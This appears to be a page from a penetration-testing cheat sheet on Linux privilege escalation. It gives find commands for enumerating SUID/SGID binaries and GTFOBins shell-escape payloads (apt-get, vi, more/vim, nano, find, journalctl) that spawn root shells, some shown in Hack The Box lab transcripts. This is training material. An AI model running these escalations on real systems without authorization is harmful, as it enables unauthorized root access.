SUID/SGID

find / -perm -u=s -type f 2>/dev/null

# Find files with SUID configured
find / -perm -4000 -type f 2>/dev/null
find / -perm 4755

# Find all the SUID/SGID executables 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Enum SUID / SGID - Find

find /etc -perm 777
find / -user username

# Find files with SUID configured
find /usr/bin -perm 4755

# Find files with SGID configured
find /usr/bin -perm 2755

# Find files with the Sticky Bit configured
find /etc -perm /1444

How to audit permissions with the find commandRed Hat

Setuid

The setuid bit appears as an s.

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Setgid

find / -uid 0 -perm -6000 -type f 2>/dev/null

find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine

GTFOBins

GTFOBinsgtfobins.github.io

apt-get

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

# id
uid=0(root) gid=0(root) groups=0(root)

Vi

sudo vi
:!sh

More -> Vim

Réduire la taille du terminal au maximum pour piéger More. Quand dans More appuyer sur v pour entrer dans VIM

Dans vim
:set shell=/bin/sh
:shell

vim | GTFOBinsgtfobins.github.io

Nano

./nano
^R^X
reset; sh 1>&0 2>&0

nano | GTFOBinsgtfobins.github.io

HTB - OpenAdmin0xSs0rZ

Find

find . -exec /bin/sh -p \; -quit`

find | GTFOBinsgtfobins.github.io

Journalctl

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls

HTB - Traverxec0xSs0rZ

journalctl | GTFOBinsgtfobins.github.io

Systemctl

systemctl | GTFOBinsgtfobins.github.io

Tool

GitHub - Frissi0n/GTFONow: Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.GitHub

PreviousEscaping Restricted Shells NextSudo Rights Abuse

Last updated 9 months ago